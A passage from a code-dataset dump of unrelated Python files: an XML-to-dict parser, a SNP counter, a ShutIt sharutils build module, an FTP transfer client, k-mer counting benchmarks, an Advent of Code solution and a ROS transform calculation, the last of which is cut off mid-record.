= cdata_key\r\n self.force_cdata = force_cdata\r\n self.cdata_separator = cdata_separator\r\n self.postprocessor = postprocessor\r\n self.dict_constructor = dict_constructor\r\n\r\n def startElement(self, name, attrs):\r\n attrs = self.dict_constructor(zip(attrs[0::2], attrs[1::2]))\r\n self.path.append((name, attrs or None))\r\n if len(self.path) > self.item_depth:\r\n self.stack.append((self.item, self.data))\r\n if self.xml_attribs:\r\n attrs = self.dict_constructor(((self.attr_prefix + key, value) for key, value in attrs.items()))\r\n else:\r\n attrs = None\r\n self.item = attrs or None\r\n self.data = None\r\n\r\n def endElement(self, name):\r\n if len(self.path) == self.item_depth:\r\n item = self.item\r\n if item is None:\r\n item = self.data\r\n should_continue = self.item_callback(self.path, item)\r\n if not should_continue:\r\n raise ParsingInterrupted()\r\n if len(self.stack):\r\n item, data = self.item, self.data\r\n self.item, self.data = self.stack.pop()\r\n if data and self.force_cdata and item is None:\r\n item = self.dict_constructor()\r\n if item is not None:\r\n if data:\r\n self.push_data(item, self.cdata_key, data)\r\n self.item = self.push_data(self.item, name, item)\r\n else:\r\n self.item = self.push_data(self.item, name, data)\r\n else:\r\n self.item = self.data = None\r\n self.path.pop()\r\n\r\n def characters(self, data):\r\n if not self.data:\r\n self.data = data\r\n else:\r\n self.data += self.cdata_separator + data\r\n\r\n def push_data(self, item, key, data):\r\n if self.postprocessor is not None:\r\n result = self.postprocessor(self.path, key, data)\r\n if result is None:\r\n return item\r\n key, data = result\r\n if item is None:\r\n item = self.dict_constructor()\r\n try:\r\n value = item[key]\r\n if isinstance(value, list):\r\n value.append(data)\r\n else:\r\n item[key] = [value, data]\r\n except KeyError:\r\n item[key] = data\r\n\r\n 
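# item now maps key to a single value, or to a list when the same key appeared more than once\r\n 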
return item\r\n\r\n\r\ndef parse(xml_input, *args, **kwargs):\r\n handler = _DictSAXHandler(*args, **kwargs)\r\n parser = expat.ParserCreate()\r\n parser.ordered_attributes = True\r\n parser.StartElementHandler = handler.startElement\r\n parser.EndElementHandler = handler.endElement\r\n parser.CharacterDataHandler = handler.characters\r\n if hasattr(xml_input, 'read'):\r\n parser.ParseFile(xml_input)\r\n else:\r\n parser.Parse(xml_input, True)\r\n return handler.item\r\n\r\n\r\ndef _emit(key, value, content_handler, attr_prefix = '@', cdata_key = '#text', root = True, preprocessor = None):\r\n if preprocessor is not None:\r\n result = preprocessor(key, value)\r\n if result is None:\r\n return\r\n key, value = result\r\n if not isinstance(value, (list, tuple)):\r\n value = [value]\r\n if root and len(value) > 1:\r\n raise ValueError('document with multiple roots')\r\n for v in value:\r\n if v is None:\r\n v = OrderedDict()\r\n elif not isinstance(v, dict):\r\n v = _unicode(v)\r\n if isinstance(v, _basestring):\r\n v = OrderedDict(((cdata_key, v),))\r\n cdata = None\r\n attrs = OrderedDict()\r\n children = []\r\n for ik, iv in v.items():\r\n if ik == cdata_key:\r\n cdata = iv\r\n continue\r\n if ik.startswith(attr_prefix):\r\n attrs[ik[len(attr_prefix):]] = iv\r\n continue\r\n children.append((ik, iv))\r\n\r\n content_handler.startElement(key, AttributesImpl(attrs))\r\n for child_key, child_value in children:\r\n _emit(child_key, child_value, content_handler, attr_prefix, cdata_key, False, preprocessor)\r\n\r\n if cdata is not None:\r\n content_handler.characters(cdata)\r\n content_handler.endElement(key)\r\n\r\n\r\ndef unparse(item, output = None, encoding = 'utf-8', **kwargs):\r\n (key, value), = item.items()\r\n must_return = False\r\n if output == None:\r\n output = StringIO()\r\n must_return = True\r\n content_handler = XMLGenerator(output, encoding)\r\n content_handler.startDocument()\r\n _emit(key, value, content_handler, **kwargs)\r\n content_handler.endDocument()\r\n if must_return:\r\n value = output.getvalue()\r\n try:\r\n value = value.decode(encoding)\r\n except AttributeError:\r\n pass\r\n\r\n return value\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/xmltodict.py","file_name":"xmltodict.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35590592358","text":"#!/usr/bin/python3\n\r\n__author__ = \"Christopher Korfmann\"\r\n__copyright__ = \"Copyright (c) 2021, Christopher Korfmann\"\r\n__license__ = \"GPL-3.0-only\"\r\n__version__ = \"1.3\"\r\n\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nimport re\r\nimport sys\r\n\r\ndefaultOutput = 'output.csv' # define default output file\r\n\r\n\r\nif len(sys.argv) < 2:\r\n sys.exit(\">>> Error - Need an input file. 
First input argument should contain the directory to a valid .map file.\\n>>> Example: snpCounter.py genome.map\\n>>> Enter 'snpCounter.py help' for more information\")\r\nif len(sys.argv) == 3:\r\n confirm = input(\r\n \">>> Warning, will overwrite any file in the current directory called \\n '\" + sys.argv[2] + \"'\\n>>> Continue? (y/n)\\n>>> \")\r\n if confirm.lower() != 'y':\r\n sys.exit(\">>> No output written. Exited successfully...\")\r\nif len(sys.argv) < 3:\r\n if (sys.argv[1].lower() == \"help\"):\r\n sys.exit(\"\\n############\\nUsage: snpCounter.py \\n############\\nInput File: valid .map file\\nOutput File: (OPTIONAL) Comma separated text list with headers, containing count of unique SNP's\\n at specific nucleotide positions from .map file.\\n\\nExample output file format:\\nPosition,Base,A,C,G,T\\n55,A,957,2,28,1\\n\\nSpecified output file will be overwritten, if one with an identical name exists \\n (or 'output.csv' in the current directory, in the case where no output is specified)\")\r\n confirm = input(\r\n \">>> Warning, will overwrite any file in the current directory called 'output.csv'\\n>>> Continue? (y/n)\\n>>> \")\r\n if confirm.lower() != 'y':\r\n sys.exit(\">>> No output written. Exited successfully...\")\r\n sys.argv.append(defaultOutput) # set output to default ('output.csv')\r\n\r\n\r\ndef main():\r\n # unique SNP objects and SNP list\r\n class snpList:\r\n total = [] # static list of all unique substitutions\r\n\r\n def __init__(self, position, base, substitution):\r\n self.position = position # integer position of SNP\r\n self.base = base # expected base at the position\r\n\r\n # initialize counters for each type of substitution\r\n if base == 'A':\r\n self.ACcount = 0\r\n self.AGcount = 0\r\n self.ATcount = 0\r\n\r\n if base == 'C':\r\n self.CAcount = 0\r\n self.CGcount = 0\r\n self.CTcount = 0\r\n\r\n if base == 'G':\r\n self.GCcount = 0\r\n self.GAcount = 0\r\n self.GTcount = 0\r\n\r\n if base == 'T':\r\n self.TCcount = 0\r\n self.TGcount = 0\r\n self.TAcount = 0\r\n\r\n self.add(substitution)\r\n snpList.total.append(self)\r\n\r\n # substitution specific incrementer\r\n def add(self, substitution):\r\n if self.base == 'A':\r\n if substitution == 'C':\r\n self.ACcount += 1\r\n if substitution == 'G':\r\n self.AGcount += 1\r\n if substitution == 'T':\r\n self.ATcount += 1\r\n\r\n if self.base == 'C':\r\n if substitution == 'G':\r\n self.CGcount += 1\r\n if substitution == 'A':\r\n self.CAcount += 1\r\n if substitution == 'T':\r\n self.CTcount += 1\r\n\r\n if self.base == 'G':\r\n if substitution == 'A':\r\n self.GAcount += 1\r\n if substitution == 'T':\r\n self.GTcount += 1\r\n if substitution == 'C':\r\n self.GCcount += 1\r\n\r\n if self.base == 'T':\r\n if substitution == 'A':\r\n self.TAcount += 1\r\n if substitution == 'G':\r\n self.TGcount += 1\r\n if substitution == 'C':\r\n self.TCcount += 1\r\n\r\n lineCount = 0\r\n try:\r\n with open(sys.argv[1], 'r') as f:\r\n\r\n for item in f.readlines():\r\n # split current line into space separated tokens\r\n # current line length may be variable across runtimes, thus it's safest to tokenize\r\n line = re.split(r'\\t', item)\r\n if len(line) > 2:\r\n lineCount += 1\r\n # tokenize the SNP string (last space separated string in each line of .map file)\r\n snpString = re.split(r'[, \\n]', line[7])\r\n # parse through current SNP string token and generate usable unique SNP token\r\n for snpToken in snpString:\r\n if snpToken:\r\n # split current SNP token into position, expected base, and substitution\r\n SNP = 
re.split(r'[:>]', snpToken)\r\n # capture actual position (not zero-based index position) of SNP\r\n snpPosition = int(SNP[0]) + 1\r\n # capture expected base\r\n base = SNP[1]\r\n # capture substituted base\r\n substitution = SNP[2]\r\n\r\n index = 0\r\n for snpElem in snpList.total: # check if current position/base pair exists in the list\r\n if snpElem.position == snpPosition and snpElem.base == base:\r\n # if exists, increment substitution specific counter\r\n snpElem.add(substitution)\r\n break\r\n index += 1\r\n\r\n # if doesn't exist, add position/base pair to list\r\n if index == len(snpList.total):\r\n snpList(snpPosition, base, substitution)\r\n except:\r\n sys.exit(\">>> Error reading input.\\n>>> Verify that the input is a valid .map file, the input directory is a valid directory, and\\n that you have privileges to access the input directory.\\n>>> No output written. Terminated...\")\r\n\r\n try:\r\n with open(sys.argv[2], 'w') as o:\r\n print('Position,Base,A,C,G,T', file=o)\r\n for final in snpList.total: # print each position/base pair and its substitution counters\r\n if final.base == 'A':\r\n print(str(final.position) + ',' + final.base + ',' + str(lineCount - (final.ACcount + final.AGcount +\r\n final.ATcount)) + ',' + str(final.ACcount) + ',' + str(final.AGcount) + ',' + str(final.ATcount), file=o)\r\n if final.base == 'C':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.CAcount) + ',' + str(lineCount - (\r\n final.CAcount + final.CGcount + final.CTcount)) + ',' + str(final.CGcount) + ',' + str(final.CTcount), file=o)\r\n if final.base == 'G':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.GAcount) + ',' + str(final.GCcount) + ',' +\r\n str(lineCount - (final.GCcount + final.GAcount + final.GTcount)) + ',' + str(final.GTcount), file=o)\r\n if final.base == 'T':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.TAcount) + ',' + str(final.TCcount) + ',' +\r\n str(final.TGcount) + ',' + str(lineCount - (final.TCcount + final.TGcount + final.TAcount)), file=o)\r\n\r\n print('>>> Output written to \\n \"' + sys.argv[2] + '\"')\r\n except:\r\n sys.exit(\">>> Error writing output.\\n>>> Verify that you have privileges to write to the output directory, or if the output file is open in another program.\\n Else, try a different directory or file.\\n>>> No output written. 
Terminated...\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# Author: Christopher Korfmann\r\n# Copyright (c) 2021, Christopher Korfmann\r\n","repo_name":"ckorfmann/snp-counter","sub_path":"snpCounter.py","file_name":"snpCounter.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27938583474","text":"from lib2to3.pgen2.driver import Driver\r\nfrom Person import Person\r\nfrom Job import Job\r\nfrom Driver import Driver\r\n\r\nPers1 = Person(32, \"Andre\", \"Pria\", 1)\r\nJob1 = Job(Pers1, 101, \"Go Jek\", \"Driver\")\r\nDri1 = Driver(Pers1, 101, \"Gofood\", \"Driver\", 1002, \"2 Jan 2020\", \"Taxi\")\r\nJob1.outputJob()\r\nDri1.outputDriver()\r\n\r\nPers2 = Person(33, \"Yuli\", \"Wanita\", 0)\r\nJob2 = Job(Pers2, 102, \"Tix.com\", \"General Manager\")\r\nJob2.outputJob()\r\nprint(\"=================================================\")\r\n\r\nPers3 = Person(34, \"Hendra\", \"Pria\", 0)\r\nJob3 = Job(Pers3, 103, \"Grab\", \"Driver\")\r\nDri3 = Driver(Pers3, 103, \"Grab\", \"Driver\", 1003, \"1 Agu 2024\", \"Sepeda Motor\")\r\nJob3.outputJob()\r\nDri3.outputDriver()\r\n\r\nPers4 = Person(35, \"Bambang\", \"Pria\", 0)\r\nJob4 = Job(Pers4, 105, \"First Media\", \"CEO\")\r\nJob4.outputJob()\r\nprint(\"=================================================\")\r\n\r\nPers5 = Person(50, \"Diana\", \"Wanita\", 1)\r\nJob5 = Job(Pers5, 106, \"Buka Lapak\", \"Staff\")\r\nJob5.outputJob()\r\nprint(\"=================================================\")\r\n","repo_name":"giovanialvin/LATIHAN4DPBO2022","sub_path":"Bagian 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42362621539","text":"from _contextvars import ContextVar\nfrom importlib import import_module\nfrom typing import Generic, TypeVar, List, Dict, Any\nfrom abc import abstractmethod, ABC\nfrom os import path\nfrom yaml import safe_load\nfrom gate.exceptions import ServiceNotFountException, ParameterNotDefinedException\n\n\nclass AbstractContainer(ABC):\n\n @abstractmethod\n def has_service(self, name: str): pass\n\n @abstractmethod\n def has_parameter(self, name: str): pass\n\n @abstractmethod\n def get_service(self, name: str): pass\n\n @abstractmethod\n def get_parameter(self, name: str): pass\n\n\nclass Container(AbstractContainer):\n\n def __init__(self, parameters: Dict[str, Any] = None, services: Dict[str, Dict] = None):\n self._parameters = parameters or {}\n self._services = services or {}\n\n def has_service(self, name: str):\n return name in self._services.keys()\n\n def has_parameter(self, name: str):\n return name in self._parameters.keys()\n\n def get_service(self, name: str):\n if not self.has_service(name):\n raise ServiceNotFountException(name)\n return self._services.get(name)\n\n def get_parameter(self, name: str):\n if not self.has_parameter(name):\n raise ParameterNotDefinedException(name)\n return self._parameters.get(name)\n\n\nclass ContainerStack(AbstractContainer):\n\n def __init__(self, containers: List[AbstractContainer] = None):\n self._containers = containers or []\n self._services = {}\n self._parameters = {}\n\n def has_service(self, name: str):\n return name in self._services.keys() or any((container.has_service(name) for container in self._containers))\n\n def has_parameter(self, name: str):\n return name in self._parameters.keys() or 
any((container.has_parameter(name) for container in self._containers))\n\n def get_service(self, name: str):\n service = self._services.get(name)\n if service is None:\n for container in self._containers:\n if container.has_service(name):\n service = container.get_service(name)\n break\n if service is None:\n raise ServiceNotFountException(name)\n else:\n self._services[name] = service\n return service\n\n def get_parameter(self, name: str):\n parameter = self._parameters.get(name)\n if parameter is None:\n for container in self._containers:\n if container.has_parameter(name):\n parameter = container.get_parameter(name)\n break\n if parameter is None:\n raise ParameterNotDefinedException(name)\n else:\n self._parameters[name] = parameter\n return parameter\n\n\nclass ContextContainer(AbstractContainer):\n\n def __init__(self, container: AbstractContainer):\n self._container = container\n self.services_instances = {}\n self.runtime_parameters = {}\n\n def has_service(self, name: str):\n return name in self.services_instances.keys() or self._container.has_service(name)\n\n def has_parameter(self, name: str):\n return name in self.runtime_parameters.keys() or self._container.has_parameter(name)\n\n def get_service(self, name: str):\n if 'container' == name:\n return self\n if name not in self.services_instances.keys():\n from .resolvers import ServiceResolver\n service_resolver = ServiceResolver(self)\n self.services_instances[name] = service_resolver.resolve(name, self._container.get_service(name))\n return self.services_instances.get(name)\n\n def get_parameter(self, name: str):\n if name not in self.runtime_parameters.keys():\n from .resolvers import ParameterResolver\n parameter_resolver = ParameterResolver(self)\n parameter = parameter_resolver.resolve(name)\n if parameter.persist:\n self.runtime_parameters[name] = parameter.value\n else:\n return parameter.value\n return self.runtime_parameters.get(name)\n\n\nclass ApplicationContainer(AbstractContainer):\n\n def __init__(self, settings, container: AbstractContainer = None):\n self._instance = ContextVar('instance', default=container)\n self._settings = settings\n\n @property\n def instance(self) -> ContextContainer:\n if self._instance.get() is None:\n containers = []\n for module in getattr(self._settings, 'MODULES', []):\n try:\n container = getattr(import_module(f'{module}.container'), 'default')\n except:\n container = None\n if container is None:\n file_path = path.join(*module.split('.'), 'service.yml')\n if path.exists(file_path):\n with open(file_path) as file_config:\n configuration = safe_load(file_config)\n container = Container(**configuration)\n if container is not None:\n containers.append(container)\n context_container = ContextContainer(ContainerStack(list(reversed(containers))))\n if self._settings:\n context_container.runtime_parameters['settings'] = self._settings\n self._instance.set(context_container)\n return self._instance.get()\n\n def has_service(self, name: str):\n return name == 'container' or self.instance.has_service(name)\n\n def has_parameter(self, name: str):\n return self.instance.has_parameter(name)\n\n def get_service(self, name: str):\n return self.instance.get_service(name)\n\n def get_parameter(self, name: str):\n return self.instance.get_parameter(name)\n","repo_name":"WatanukiRasadar/gate","sub_path":"gate/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"31705368957","text":"\"\"\"ShutIt module. See http://shutit.tk\n\"\"\"\n\nfrom shutit_module import ShutItModule\n\n\nclass sharutils(ShutItModule):\n\n\tdef build(self, shutit):\n\t\tshutit.send('mkdir -p /tmp/build/sharutils')\n\t\tshutit.send('cd /tmp/build/sharutils')\n\t\tshutit.send('wget -qO- http://ftp.gnu.org/gnu/sharutils/sharutils-4.14.tar.xz | xz -d | tar -xf -')\n\t\tshutit.send('cd sharutils*')\n\t\tshutit.send('./configure --prefix=/usr')\n\t\tshutit.send('make')\n\t\tshutit.send('make install')\n\t\treturn True\n\n\t#def get_config(self, shutit):\n\t#\tshutit.get_config(self.module_id,'item','default')\n\t#\treturn True\n\n\tdef finalize(self, shutit):\n\t\tshutit.send('rm -rf /tmp/build/sharutils')\n\t\treturn True\n\n\t#def remove(self, shutit):\n\t#\treturn True\n\n\t#def test(self, shutit):\n\t#\treturn True\n\ndef module():\n\treturn sharutils(\n\t\t'shutit.tk.sd.sharutils.sharutils', 158844782.0012,\n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdepends=['shutit.tk.setup']\n\t)\n\n","repo_name":"ianmiell/shutit-distro","sub_path":"sharutils/sharutils.py","file_name":"sharutils.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"22025347466","text":"import logging\nimport sys\nlogging.basicConfig(level=logging.INFO)\nimport numpy as np\nimport time\nfrom kmer_mapper.mapper import map_kmers_to_graph_index\nfrom npstructures import Counter\nfrom graph_kmer_index import KmerIndex, CounterKmerIndex\nfrom kmer_mapper.parser import BufferedNumpyParser, OneLineFastaBuffer2Bit\nfrom kmer_mapper.kmers import KmerHash, TwoBitHash\nfrom kmer_mapper.util import log_memory_usage_now\nfrom shared_memory_wrapper import from_file, to_shared_memory, from_shared_memory, to_file\nfrom profilehooks import profile\n\n\ndef get_kmer_hashes():\n parser = BufferedNumpyParser.from_filename(sys.argv[2], 1250000 * 130)\n chunks = parser.get_chunks()\n reads = (to_shared_memory(chunk) for chunk in chunks)\n\n return reads\n raw_chunk = next(chunks)\n sequence_chunk = raw_chunk.get_sequences()\n\n\n return hashes\n\n#@profile\ndef map_with_counter(kmers, index):\n return index.counter.count(kmers)\n #return index.count_kmers(kmers)\n\n\ndef _map_with_cython(reads, index):\n max_node_id = 83559391\n \n raw_chunk = from_shared_memory(OneLineFastaBuffer2Bit, reads)\n sequence_chunk = raw_chunk.get_sequences()\n logging.info(\"Size of sequence chunk (GB): %.3f\" % (sequence_chunk.nbytes() / 1000000000))\n\n t = time.perf_counter()\n hashes = TwoBitHash(k=31).get_kmer_hashes(sequence_chunk)\n logging.info(\"Size of hashes (GB): %.3f\" % (hashes.nbytes / 1000000000))\n logging.info(\"Time spent to get %d kmer hashes: %.3f\" % (len(hashes), time.perf_counter() - t))\n\n\ndef map_with_cython(hashes, index):\n return map_kmers_to_graph_index(index, index.max_node_id(), hashes, 1000)\n\nkmer_index = KmerIndex.from_file(\"tests/kmer_index_only_variants_with_revcomp.npz\")\nkmer_index.convert_to_int32()\nkmer_index.remove_ref_offsets()\n\n#kmers = kmer_index._kmers\n#np.random.shuffle(kmers)\n\nkmers = np.random.randint(0, 1000000000000, 100000000, dtype=np.uint64)\n#counter = CounterKmerIndex.from_kmer_index(kmer_index)\n\n\nfrom numba_kmer_counter.numba_kmer_counter import Index\nfrom numba_kmer_counter import numba_kmer_counter as nkc\nnumba_counter = nkc.Counter(nkc.Index.from_unique_kmers(np.unique(kmer_index._kmers), modulo=kmer_index._modulo))\nnumba_index = 
numba_counter.index\nnumba_index = from_file(to_file(numba_index))\nprint(numba_counter)\n\ndef numba_count(kmers, index):\n nkc.Index.query_numba(index, kmers)\n #index.count(kmers)\n\n\nfrom numba_kmer_counter.cython_functions import query_index\nfrom numba_kmer_counter import cython_functions\ndef new_cython_count(kmers, index):\n return cython_functions.query_index(index, kmers)\n\ndef old_new_cython_count(kmers, index):\n return cython_functions.map_kmers_to_graph_index(index, kmers)\n\ndef old_cython_count_in_new_code(kmers, index):\n return cython_functions.map_kmers_to_graph_index_old(index, index.max_node_id(), kmers)\n\n#reads = get_kmer_hashes()\n\n#logging.info(\"N kmer hashes: %d\" % len(kmers))\n\n\nprint(kmers)\nprint(\"N kmers: %d\" % len(kmers))\n\nlogging.info(\"Making counter\")\n#counter = Counter(index_kmers)\n#counter = from_file(\"tests/counter_index.npz\")\ncounter = CounterKmerIndex.from_kmer_index(kmer_index)\ncounter = from_file(to_file(counter))\n#kmers = np.concatenate([index_kmers for i in range(100)])\n\n\n\nlogging.info(\"Getting kmers\")\n\n#kmers = np.random.randint(0, 4**31, 96000000, dtype=np.int64)\n\nimport bionumpy as bnp\n#file = bnp.open(sys.argv[3])\n#chunks = file.read_chunks()\n\n\nfor _ in range(3):\n #for function, index in [(old_cython_count_in_new_code, kmer_index), (old_new_cython_count, kmer_index), (numba_count, numba_index), (map_with_counter, counter), (map_with_cython, kmer_index), (new_cython_count, numba_index)]:\n for function, index in [(numba_count, numba_index), (map_with_counter, counter), (map_with_cython, kmer_index), (new_cython_count, numba_index)]:\n #for function, index in [(map_with_cython, kmer_index2)]:\n t = time.perf_counter()\n function(kmers, index)\n print(str(function), time.perf_counter()-t)\n\n\n\n\n\n\n","repo_name":"ivargr/kmer_mapper","sub_path":"test_counter.py","file_name":"test_counter.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17886271190","text":"import ftplib\nfrom ftplib import FTP\nimport logging\nimport os\nimport argparse\nimport json\n\nDEBUG_LOG_LEVEL = 2\n\nclass FTPClient:\n def __init__(self, debug_level=DEBUG_LOG_LEVEL):\n self.ftp = 0\n self.debug_level = debug_level\n self.host = ''\n\n def connect(self, addr, username, password):\n self.host, self.port = addr\n self.ftp = FTP()\n self.ftp.set_debuglevel(self.debug_level)\n try:\n logging.debug('Connecting %s:%s'%(self.host, self.port))\n self.ftp.connect(self.host, self.port)\n except OSError as err:\n logging.error(\"Connect %s:%d failed!, %s\"%(self.host, self.port, err))\n return False\n try:\n self.ftp.login(username, password)\n except ftplib.all_errors as err:\n logging.error(\"Login %s failed!, %s\"%(username, err))\n return False\n\n logging.info('Connect %s:%d success'%addr)\n return True\n\n def download(self, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath,'wb')\n try:\n self.ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)\n logging.info('Download %s from %s success'%(remotepath, self.host))\n except ftplib.all_errors as err:\n logging.error(\"Download %s from %s failed!, %s\"%(remotepath, self.host, err))\n fp.close()\n\n def upload(self, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath, 'rb')\n try:\n self.ftp.storbinary('STOR '+ remotepath , fp, bufsize)\n logging.info('Upload %s from %s success'%(remotepath, self.host))\n except ftplib.all_errors as err:\n logging.error(\"Upload 
%s from %s failed!, %s\"%(localpath, self.host, err))\n        fp.close()\n\n    def delete(self, remotepath):\n        try:\n            self.ftp.delete(remotepath)\n            logging.info('Delete %s from %s success'%(remotepath, self.host))\n        except ftplib.all_errors as err:\n            logging.error(\"Delete %s from %s failed!, %s\"%(remotepath, self.host, err))\n        \n\ndef loadFTPServerList(config_file):\n    server_list = []\n    with open(config_file) as config:\n        config_dict = json.load(config)\n        logging.debug(config_dict)\n        ftp_servers = config_dict['ftp_server']\n        for server in ftp_servers:\n            server_list.append((server[\"ip\"], server[\"port\"]))\n\n    return server_list\n\n\nif __name__ == \"__main__\":\n    LOG_FORMAT = \"[%(asctime)s:%(levelname)s:%(funcName)s] %(message)s\"\n    log_level = logging.DEBUG\n    logging.basicConfig(level=log_level, format=LOG_FORMAT)\n\n    arg_parser = argparse.ArgumentParser(description='manual to this script')\n    arg_parser.add_argument('-c', '--config_file', help='config file', type=str)\n    arg_parser.add_argument('-d', '--delete', help='delete file', type=str)\n    arg_parser.add_argument('-u', '--upload', help='upload file', action=\"store_true\")\n    arg_parser.add_argument('-p', '--pull', help='pull file', action=\"store_true\")\n    arg_parser.add_argument('-r', '--remote_path', help='remote path', type=str)\n    arg_parser.add_argument('-l', '--local_path', help='local path', type=str)\n    args = arg_parser.parse_args()\n\n    config_file = args.config_file\n\n    ftp_list = loadFTPServerList(config_file)\n    logging.debug(ftp_list)\n\n    ftp_client_list = []\n    for ftp_host in ftp_list:\n        ftp_client = FTPClient(0)\n        ret = ftp_client.connect(ftp_host,\n                            'qpy3', 'qpy3')\n\n        if ret:\n            ftp_client_list.append(ftp_client)\n\n    \n    if args.delete:\n        delete_path = args.delete\n        for client in ftp_client_list:\n            client.delete(delete_path)\n    elif args.upload:\n        remote_path = args.remote_path\n        local_path = args.local_path\n        for client in ftp_client_list:\n            client.upload(remote_path, local_path)\n    elif args.pull:\n        remote_path = args.remote_path\n        local_path = args.local_path\n        for client in ftp_client_list:\n            client.download(remote_path, local_path)\n","repo_name":"shmilycode/FTPClient","sub_path":"ftp.py","file_name":"ftp.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73210906724","text":"### December 2nd\n\ndef first_ex(puzzle):\n\n    all_diff = []\n    for el in puzzle:\n        number = [int(digit) for digit in el]\n        all_diff.append(max(number)-min(number))\n\n    return sum(all_diff)\n\ndef second_ex(puzzle):\n\n    rows_div = []\n    for el in puzzle:\n        number = [int(digit) for digit in el]\n        div = []\n        for i in range(len(number)):\n            for j in range(0, len(number)):\n                if ((number[i]%number[j])==0 or (number[j]%number[i])==0) and (i!=j):\n                    div.append(number[i]//number[j])\n\n        rows_div.append(sum(div))\n\n    return sum(rows_div)\n\nif __name__ == '__main__':\n\n    input_path = './input_dec2nd.txt'\n    puzzle = open(input_path).read().strip()\n    puzzle = [el.split('\\t') for el in puzzle.split('\\n')]\n\n    result_first = first_ex(puzzle)\n    print('Result: (first_ex): %d' %result_first)\n\n    result_second = second_ex(puzzle)\n    print('Result: (second_ex): %d' %result_second)\n","repo_name":"giorgia2988/adventOfCode17","sub_path":"dec2nd.py","file_name":"dec2nd.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33299726489","text":"import rospy\nimport tf\nfrom tf 
import TransformListener\nimport numpy as np\n\ndef main():\n c1Link_to_c1ColorOpticalFrame_pos = np.asarray([-0.000, 0.015, 0.000])\n c1Link_to_c1ColorOpticalFrame_rot = tf.transformations.quaternion_matrix(np.asarray([0.506, -0.494, 0.507, -0.492]))\n\n mat = np.asarray([[ 0.4060203 , 0.75756728, -0.51111576, 0.17559398],\n [-0.76612722, 0.58706488, 0.26154141, -0.0421986 ],\n [ 0.49819333, 0.28538857, 0.81875318, 0.0133699 ],\n [ 0. , 0. , 0. , 1. ]])\n\n c2ColorOpticalFrame_to_c2Link_pos = np.asarray([0.015, 0.001, -0.000])\n c2ColorOpticalFrame_to_c2Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.507, -0.495, 0.501, 0.497]))\n\n # now form the transformation matrices\n c1Link_to_c1ColorOpticalFrame = c1Link_to_c1ColorOpticalFrame_rot\n c1Link_to_c1ColorOpticalFrame[:3, 3] = c1Link_to_c1ColorOpticalFrame_pos\n\n c2ColorOpticalFrame_to_c2Link = c2ColorOpticalFrame_to_c2Link_rot\n c2ColorOpticalFrame_to_c2Link[:3, 3] = c2ColorOpticalFrame_to_c2Link_pos\n\n c1Link_to_c2ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(mat))\n c1Link_to_c2Link = np.dot(c1Link_to_c2ColorOpticalFrame, c2ColorOpticalFrame_to_c2Link)\n\n c1Link_to_c2Link_pos = c1Link_to_c2Link[:3, 3]\n c1Link_to_c2Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c2Link)\n\n # .................. for camera3 to camera1 .................................... #\n \n c1_to_c3_mat = np.asarray([[-0.32151113, 0.78765464, -0.5255766 , 0.34445858],\n [-0.70964797, 0.1670522 , 0.68446572, -0.18581281],\n [ 0.62692133, 0.59303771, 0.50524837, 0.13664849],\n [ 0. , 0. , 0. , 1. ]])\n\n c3ColorOpticalFrame_to_c3Link_pos = np.asarray([0.015, 0.001, 0.000])\n c3ColorOpticalFrame_to_c3Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.495, 0.504, 0.495]))\n c3ColorOpticalFrame_to_c3Link = c3ColorOpticalFrame_to_c3Link_rot\n c3ColorOpticalFrame_to_c3Link[:3, 3] = c3ColorOpticalFrame_to_c3Link_pos\n\n c1Link_to_c3ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c3_mat))\n c1Link_to_c3Link = np.dot(c1Link_to_c3ColorOpticalFrame, c3ColorOpticalFrame_to_c3Link)\n\n c1Link_to_c3Link_pos = c1Link_to_c3Link[:3, 3]\n c1Link_to_c3Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c3Link)\n\n # .................. for camera4 to camera1 ..................................... #\n c1_to_c4_mat = np.asarray([[-0.98034758, -0.19519336, -0.02860359, -0.01197254],\n [-0.00334246, -0.12853606, 0.9916992 , -0.37062505],\n [-0.19724969, 0.97230552, 0.12535759, 0.34614991],\n [ 0. , 0. , 0. , 